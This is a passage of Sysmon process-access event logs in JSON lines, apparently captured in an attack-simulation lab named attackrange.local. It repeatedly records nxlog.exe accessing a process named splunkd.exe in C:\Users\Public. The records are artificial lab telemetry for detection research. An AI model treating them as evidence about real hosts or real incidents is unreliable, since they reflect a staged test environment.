(x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:50:11.199","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3596","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:50:13","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:50:12","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2811,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:50:12.202\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3576\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:50:12.202","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3576","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:50:13","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:50:13","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2812,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:50:13.205\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3592\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:50:13.205","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3592","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:50:15","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:50:14","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2813,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:50:14.209\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3576\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:50:14.209","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3576","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:50:15","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:50:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2814,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:50:15.212\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3580\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:50:15.212","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3580","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:50:17","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:50:16","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2815,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:50:16.215\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3576\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:50:16.215","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3576","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:50:17","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:50:17","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2816,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:50:17.218\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3596\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:50:17.218","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3596","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files 